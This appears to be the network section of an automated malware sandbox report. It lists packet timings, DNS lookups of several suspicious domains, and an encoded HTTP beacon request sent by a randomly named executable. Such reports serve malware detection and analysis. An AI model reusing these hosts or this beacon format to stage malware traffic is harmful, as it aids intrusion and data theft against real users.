                                      Aug 26, 2024 18:28:47.847742081 CEST804975666.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:47.847795963 CEST804975666.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:47.847810030 CEST804975666.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:47.847832918 CEST4975680192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:47.847834110 CEST804975666.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:47.847877979 CEST4975680192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:48.783806086 CEST4975680192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:49.799256086 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:49.805269957 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.805347919 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:49.816984892 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:49.821868896 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.821899891 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.821909904 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.821964979 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.821974993 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.822006941 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.822016954 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.822046995 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:49.822057009 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436723948 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436754942 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436774969 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436785936 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436796904 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436810017 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436820984 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436820984 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:50.436834097 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436844110 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436856031 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.436856031 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:50.436881065 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:50.436970949 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:50.441699982 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.441744089 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.441755056 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.441842079 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:50.441854000 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.441941023 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:50.442011118 CEST804975766.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:50.442080021 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:51.328099966 CEST4975780192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:52.349792957 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:52.354862928 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:52.354950905 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:52.362318993 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:52.367237091 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260545015 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260561943 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260576010 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260600090 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260612011 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260629892 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260658026 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260670900 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260685921 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260706902 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.260718107 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:53.260783911 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:53.265657902 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.265723944 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.265738010 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.265770912 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:53.265819073 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:53.265898943 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:53.269273996 CEST4975880192.168.2.466.29.149.180
                                      Aug 26, 2024 18:28:53.274132013 CEST804975866.29.149.180192.168.2.4
                                      Aug 26, 2024 18:28:58.603804111 CEST4975980192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:28:58.608630896 CEST8049759103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:28:58.608722925 CEST4975980192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:28:58.619807959 CEST4975980192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:28:58.624675989 CEST8049759103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:28:59.227731943 CEST8049759103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:28:59.227790117 CEST8049759103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:28:59.227842093 CEST4975980192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:00.124229908 CEST4975980192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:01.143873930 CEST4976080192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:01.148822069 CEST8049760103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:01.148894072 CEST4976080192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:01.161868095 CEST4976080192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:01.167992115 CEST8049760103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:01.796082973 CEST8049760103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:01.796314001 CEST8049760103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:01.796358109 CEST4976080192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:02.671308994 CEST4976080192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:03.700870991 CEST4976180192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:03.705776930 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.705877066 CEST4976180192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:03.811546087 CEST4976180192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:03.816447973 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816497087 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816509962 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816519976 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816536903 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816560030 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816576958 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816595078 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:03.816605091 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:04.481363058 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:04.481601000 CEST8049761103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:04.481821060 CEST4976180192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:05.327426910 CEST4976180192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:06.346270084 CEST4976280192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:06.351239920 CEST8049762103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:06.351428986 CEST4976280192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:06.358953953 CEST4976280192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:06.363769054 CEST8049762103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:06.991321087 CEST8049762103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:06.991385937 CEST8049762103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:06.991398096 CEST8049762103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:06.991492987 CEST4976280192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:06.994982004 CEST4976280192.168.2.4103.224.182.242
                                      Aug 26, 2024 18:29:06.999994040 CEST8049762103.224.182.242192.168.2.4
                                      Aug 26, 2024 18:29:12.277843952 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:12.282694101 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:12.282865047 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:12.293653011 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:12.298456907 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:13.210680008 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:13.210710049 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:13.210721016 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:13.210752964 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:13.210752964 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:13.210786104 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:13.210803986 CEST804976318.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:13.210848093 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:13.796174049 CEST4976380192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:14.815304041 CEST4976480192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:14.820106983 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:14.820228100 CEST4976480192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:14.831312895 CEST4976480192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:14.837048054 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:15.767393112 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:15.767405987 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:15.767427921 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:15.767441034 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:15.767452002 CEST804976418.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:15.767493963 CEST4976480192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:15.767551899 CEST4976480192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:16.345889091 CEST4976480192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:17.363148928 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:17.368340015 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.368418932 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:17.381459951 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:17.386529922 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386539936 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386554956 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386564016 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386571884 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386581898 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386590004 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386600018 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:17.386607885 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.300373077 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.300389051 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.300399065 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.300410032 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.300487995 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:18.300543070 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:18.539123058 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.539164066 CEST804976518.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:18.539264917 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:18.889944077 CEST4976580192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:19.909501076 CEST4976680192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:19.914427042 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:19.914490938 CEST4976680192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:19.924750090 CEST4976680192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:19.929701090 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825329065 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825344086 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825354099 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825366020 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825375080 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825388908 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:20.825516939 CEST4976680192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:20.830415010 CEST4976680192.168.2.418.183.3.45
                                      Aug 26, 2024 18:29:20.836251974 CEST804976618.183.3.45192.168.2.4
                                      Aug 26, 2024 18:29:34.016236067 CEST4976780192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:34.021106005 CEST8049767176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:34.021182060 CEST4976780192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:34.033292055 CEST4976780192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:34.038676977 CEST8049767176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:34.702248096 CEST8049767176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:34.702322006 CEST8049767176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:34.702634096 CEST4976780192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:35.546336889 CEST4976780192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:36.566840887 CEST4976880192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:36.571662903 CEST8049768176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:36.575983047 CEST4976880192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:36.587841034 CEST4976880192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:36.592654943 CEST8049768176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:37.448333979 CEST8049768176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:37.456274986 CEST8049768176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:37.456334114 CEST4976880192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:38.093029022 CEST4976880192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:39.112759113 CEST4976980192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:39.117748976 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.117835045 CEST4976980192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:39.131866932 CEST4976980192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:39.136774063 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136794090 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136811018 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136821032 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136827946 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136878014 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136887074 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136919975 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.136929035 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.827151060 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.827275038 CEST8049769176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:39.827554941 CEST4976980192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:40.640022993 CEST4976980192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:42.053399086 CEST4977080192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:42.058343887 CEST8049770176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:42.058410883 CEST4977080192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:42.069953918 CEST4977080192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:42.074824095 CEST8049770176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:42.704710960 CEST8049770176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:42.705123901 CEST8049770176.57.64.102192.168.2.4
                                      Aug 26, 2024 18:29:42.705171108 CEST4977080192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:42.708353996 CEST4977080192.168.2.4176.57.64.102
                                      Aug 26, 2024 18:29:42.713104963 CEST8049770176.57.64.102192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 26, 2024 18:27:33.528343916 CEST5510653192.168.2.41.1.1.1
                                      Aug 26, 2024 18:27:33.562743902 CEST53551061.1.1.1192.168.2.4
                                      Aug 26, 2024 18:27:50.127087116 CEST5115353192.168.2.41.1.1.1
                                      Aug 26, 2024 18:27:50.136071920 CEST53511531.1.1.1192.168.2.4
                                      Aug 26, 2024 18:28:03.658237934 CEST5499753192.168.2.41.1.1.1
                                      Aug 26, 2024 18:28:04.011404991 CEST53549971.1.1.1192.168.2.4
                                      Aug 26, 2024 18:28:17.682051897 CEST6370353192.168.2.41.1.1.1
                                      Aug 26, 2024 18:28:17.695058107 CEST53637031.1.1.1192.168.2.4
                                      Aug 26, 2024 18:28:30.815356016 CEST6306253192.168.2.41.1.1.1
                                      Aug 26, 2024 18:28:31.067562103 CEST53630621.1.1.1192.168.2.4
                                      Aug 26, 2024 18:28:44.675792933 CEST5053453192.168.2.41.1.1.1
                                      Aug 26, 2024 18:28:44.707076073 CEST53505341.1.1.1192.168.2.4
                                      Aug 26, 2024 18:28:58.284194946 CEST5452453192.168.2.41.1.1.1
                                      Aug 26, 2024 18:28:58.597773075 CEST53545241.1.1.1192.168.2.4
                                      Aug 26, 2024 18:29:12.003802061 CEST6467353192.168.2.41.1.1.1
                                      Aug 26, 2024 18:29:12.272011995 CEST53646731.1.1.1192.168.2.4
                                      Aug 26, 2024 18:29:25.846339941 CEST5545753192.168.2.41.1.1.1
                                      Aug 26, 2024 18:29:25.856025934 CEST53554571.1.1.1192.168.2.4
                                      Aug 26, 2024 18:29:33.909178972 CEST6187953192.168.2.41.1.1.1
                                      Aug 26, 2024 18:29:34.012881041 CEST53618791.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Aug 26, 2024 18:27:33.528343916 CEST192.168.2.41.1.1.10xc78cStandard query (0)www.weep.siteA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:27:50.127087116 CEST192.168.2.41.1.1.10xee09Standard query (0)www.88nn.proA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:03.658237934 CEST192.168.2.41.1.1.10xc35eStandard query (0)www.fontanerourgente.netA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:17.682051897 CEST192.168.2.41.1.1.10xfd64Standard query (0)www.onlytradez.clubA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:30.815356016 CEST192.168.2.41.1.1.10x1181Standard query (0)www.32wxd.topA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:44.675792933 CEST192.168.2.41.1.1.10xc471Standard query (0)www.jaxo.xyzA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:58.284194946 CEST192.168.2.41.1.1.10x2ee6Standard query (0)www.xforum.techA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:29:12.003802061 CEST192.168.2.41.1.1.10xc5b8Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:29:25.846339941 CEST192.168.2.41.1.1.10x194aStandard query (0)www.taapbit.onlineA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:29:33.909178972 CEST192.168.2.41.1.1.10x8febStandard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Aug 26, 2024 18:27:33.562743902 CEST1.1.1.1192.168.2.40xc78cNo error (0)www.weep.siteweep.siteCNAME (Canonical name)IN (0x0001)false
                                      Aug 26, 2024 18:27:33.562743902 CEST1.1.1.1192.168.2.40xc78cNo error (0)weep.site194.233.65.154A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:27:50.136071920 CEST1.1.1.1192.168.2.40xee09No error (0)www.88nn.pro45.157.69.194A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:04.011404991 CEST1.1.1.1192.168.2.40xc35eNo error (0)www.fontanerourgente.netfontanerourgente.netCNAME (Canonical name)IN (0x0001)false
                                      Aug 26, 2024 18:28:04.011404991 CEST1.1.1.1192.168.2.40xc35eNo error (0)fontanerourgente.net37.187.158.211A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:17.695058107 CEST1.1.1.1192.168.2.40xfd64No error (0)www.onlytradez.club167.172.133.32A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:31.067562103 CEST1.1.1.1192.168.2.40x1181No error (0)www.32wxd.top32wxd.topCNAME (Canonical name)IN (0x0001)false
                                      Aug 26, 2024 18:28:31.067562103 CEST1.1.1.1192.168.2.40x1181No error (0)32wxd.top206.119.82.116A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:44.707076073 CEST1.1.1.1192.168.2.40xc471No error (0)www.jaxo.xyz66.29.149.180A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:28:58.597773075 CEST1.1.1.1192.168.2.40x2ee6No error (0)www.xforum.tech103.224.182.242A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:29:12.272011995 CEST1.1.1.1192.168.2.40xc5b8No error (0)www.cannulafactory.top18.183.3.45A (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:29:25.856025934 CEST1.1.1.1192.168.2.40x194aName error (3)www.taapbit.onlinenonenoneA (IP address)IN (0x0001)false
                                      Aug 26, 2024 18:29:34.012881041 CEST1.1.1.1192.168.2.40x8febNo error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • www.weep.site
                                      • www.88nn.pro
                                      • www.fontanerourgente.net
                                      • www.onlytradez.club
                                      • www.32wxd.top
                                      • www.jaxo.xyz
                                      • www.xforum.tech
                                      • www.cannulafactory.top
                                      • www.ayypromo.shop

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449736194.233.65.154805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:27:33.584745884 CEST479OUTGET /v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.weep.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:27:35.087604046 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:27:34 GMT
                                      Server: Apache
                                      Accept-Ranges: bytes
                                      Cache-Control: no-cache, no-store, must-revalidate
                                      Pragma: no-cache
                                      Expires: 0
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html
                                      Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                      Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                      Aug 26, 2024 18:27:35.087625027 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                      Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                      Aug 26, 2024 18:27:35.087671041 CEST448INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
